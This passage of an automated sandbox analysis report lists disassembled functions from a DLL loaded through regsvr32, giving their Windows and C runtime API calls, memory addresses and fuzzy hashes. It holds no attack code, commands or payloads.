                                                                    • LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD0F5
                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD111
                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD139
                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD142
                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD158
                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD161
                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD177
                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD180
                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD19E
                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD1A7
                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD1D9
                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD1E8
                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD240
                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD260
                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FF8CA9B70D4,?,?,?,?,?,00007FF8CA9B7194), ref: 00007FF8CA9BD279
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                    • API String ID: 3085332118-232180764
                                                                    • Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                    • Instruction ID: 50871ee6c385e2d3d32109aadfcd13d758faa3e2a528b0cd3970563260d46699
                                                                    • Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                    • Instruction Fuzzy Hash: 9251B420A0AB4390FEA5EF52B86E2742390AF85BD4F4405F5DD6E877A5EE3CE54D8201
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9C028C Relevance: 21.3, APIs: 14, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CA9C07CE), ref: 00007FF8CA9C02F9
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CA9C07CE), ref: 00007FF8CA9C030D
                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CA9C07CE), ref: 00007FF8CA9C0410
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CompareErrorInfoLastString
                                                                    • String ID:
                                                                    • API String ID: 3723911898-0
                                                                    • Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                    • Instruction ID: ef75186bd06483ec9af1c4902341fb87d7e04f0952ab4a1935f6a401bdf17254
                                                                    • Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                    • Instruction Fuzzy Hash: A9E1A222A08BC28BEB309F55B46A37D2791BB447DCF544675DA6D87BC4DE3CA948C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B76A0 Relevance: 19.7, APIs: 13, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
                                                                    • String ID:
                                                                    • API String ID: 3466867069-0
                                                                    • Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                    • Instruction ID: 4736afbea9a0a1315355fe154beda34358b5e897777b6e125e7355f879114ca4
                                                                    • Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                    • Instruction Fuzzy Hash: FE719D21E0A70349FF799F19B4BF2792291AF41BC4F1826B5C67EC66E1DE2CE449C241
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B2E18 Relevance: 18.1, APIs: 12, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1575098132-0
                                                                    • Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                    • Instruction ID: 5d2e0c82f768a76f75a37fd2285a305311a42cf8bdadda652540f8fffb929acc
                                                                    • Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                    • Instruction Fuzzy Hash: A9310011A1A74285FF78EEA2B47B3795255EF80BC4F0415B5DA2E87696CF2CE8488312
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9C0A34 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 256COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                    • String ID: @Ce
                                                                    • API String ID: 3451773520-1767366083
                                                                    • Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                    • Instruction ID: 0db099b39cdc1b24002f0d62155c3abe40385f7c6b92a7db0df3ae3b298965f8
                                                                    • Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
                                                                    • Instruction Fuzzy Hash: 68A19025E09F4241EA20EF15B92A37A6295BF40BDCF1486B5DA7DC77C6DE3CA49D8300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BA250 Relevance: 15.3, APIs: 10, Instructions: 253COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorInfoLast
                                                                    • String ID:
                                                                    • API String ID: 189849726-0
                                                                    • Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                    • Instruction ID: 4d56471cac12c05240552a37f7f493e17082e650711b06ed37340f8a20c13ce6
                                                                    • Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                    • Instruction Fuzzy Hash: 8FB1D032A0878186DB20CF25B4692ADB7A4FB48B84F844176EB6CC3B91DF7DD549C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B4F04 Relevance: 13.8, APIs: 11, Instructions: 90COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1012874770-0
                                                                    • Opcode ID: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                    • Instruction ID: df4a72bf26357eb4724cac9544dd1c929b53ec7245539ba667693443015a8a83
                                                                    • Opcode Fuzzy Hash: 3c3af7d426be30cf8e9a0f4f5ff6786eb9999c553a10af8131577c7025441718
                                                                    • Instruction Fuzzy Hash: 54411232A0978284FF75DF61F56A3B923A0AF84BC4F041071DA2D8B695CF2DE489C311
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BE23C Relevance: 13.7, APIs: 9, Instructions: 177COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE292
                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE2B1
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE356
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE3B5
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE3F0
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE42C
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE46C
                                                                    • free.LIBCMT ref: 00007FF8CA9BE47A
                                                                    • free.LIBCMT ref: 00007FF8CA9BE49C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$Infofree
                                                                    • String ID:
                                                                    • API String ID: 1638741495-0
                                                                    • Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                    • Instruction ID: 8efce60e655aabc01cac9a3d3d4e4601f18477e1bbb776e447e88ec73a9ba258
                                                                    • Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                    • Instruction Fuzzy Hash: 2F612A32A087828AE7309F15B8691B976EAFF447E8F584675DA2D83BD4CF3CD4498300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B352C Relevance: 13.6, APIs: 9, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                    • String ID:
                                                                    • API String ID: 2551688548-0
                                                                    • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                    • Instruction ID: 2c84bbb3a5647ad55b7577755723f10b396fb3c74579581eac5a11752ebf8055
                                                                    • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                    • Instruction Fuzzy Hash: A1417F21A09B4280EB60DF15F86F27A6294FF487C8F4441B4DA6D83B96EF3CE44D8705
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B8F34 Relevance: 12.2, APIs: 8, Instructions: 173COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B8F94
                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B8FA6
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B9006
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B90BC
                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B90D3
                                                                    • free.LIBCMT ref: 00007FF8CA9B90E4
                                                                    • GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CA9B9206), ref: 00007FF8CA9B9161
                                                                    • free.LIBCMT ref: 00007FF8CA9B9171
                                                                      • Part of subcall function 00007FF8CA9BE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE292
                                                                      • Part of subcall function 00007FF8CA9BE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE2B1
                                                                      • Part of subcall function 00007FF8CA9BE23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE3B5
                                                                      • Part of subcall function 00007FF8CA9BE23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CA9BE3F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3535580693-0
                                                                    • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                    • Instruction ID: fca98ea44daedd322a0e41c85e4af4d76788141aedea51e75df010aca079b2f4
                                                                    • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                    • Instruction Fuzzy Hash: D661B432B1474286DB309FA1F4AA5786791FB44BE8B144275DA3D93BD4DF3CE8498340
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B3758 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetStartupInfoA.KERNEL32 ref: 00007FF8CA9B377D
                                                                      • Part of subcall function 00007FF8CA9B3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B314D
                                                                    • GetFileType.KERNEL32 ref: 00007FF8CA9B38FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: FileInfoSleepStartupType
                                                                    • String ID: @
                                                                    • API String ID: 1527402494-2766056989
                                                                    • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                    • Instruction ID: d8ac1b4134db76242c5a0b2928d456d3548a208c638824d17f610c64be2636ca
                                                                    • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                    • Instruction Fuzzy Hash: CB917C22A18B8285E720CF29B46E3293A95BB057B4F6547B5C67D876E0DF7CE849C301
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B25F8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_getptd
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 3432092939-699404926
                                                                    • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                    • Instruction ID: 65debe22664c4fdeb38e08a27ece863edf79d84074ffaef8ff257a9574e2a88c
                                                                    • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                    • Instruction Fuzzy Hash: 7F71F262D1C78281FBB54E15B4BF37A2691EB547D4F2541B6CA7A862D0DE3CF8488307
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B6AB8 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _FF_MSGBANNER.LIBCMT ref: 00007FF8CA9B6ADF
                                                                      • Part of subcall function 00007FF8CA9B6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF8CA9B7194,?,?,?,?,00007FF8CA9B6C69,?,?,00000000,00007FF8CA9B30C0), ref: 00007FF8CA9B6FCF
                                                                      • Part of subcall function 00007FF8CA9B334C: ExitProcess.KERNEL32 ref: 00007FF8CA9B335B
                                                                      • Part of subcall function 00007FF8CA9B309C: Sleep.KERNEL32(?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3,?,?,?,?,?,?,00000000,00007FF8CA9B2DC8), ref: 00007FF8CA9B30D2
                                                                    • _errno.LIBCMT ref: 00007FF8CA9B6B21
                                                                    • _lock.LIBCMT ref: 00007FF8CA9B6B35
                                                                    • free.LIBCMT ref: 00007FF8CA9B6B57
                                                                    • _errno.LIBCMT ref: 00007FF8CA9B6B5C
                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF8CA9B6BC3,?,?,?,?,?,?,00000000,00007FF8CA9B2DC8,?,?,?,00007FF8CA9B2DFF), ref: 00007FF8CA9B6B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
                                                                    • String ID:
                                                                    • API String ID: 1354249094-0
                                                                    • Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                    • Instruction ID: a8b23b4cf3d8841b104939052d7b0096187ed8879ba5c29b70b389dd482b88b5
                                                                    • Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                    • Instruction Fuzzy Hash: D6215E20A1D71282F770AF11B86A3BA6264EF847C4F0451B5E66EC66C2CF3CF4488710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B2D70 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B2D7A
                                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B2D88
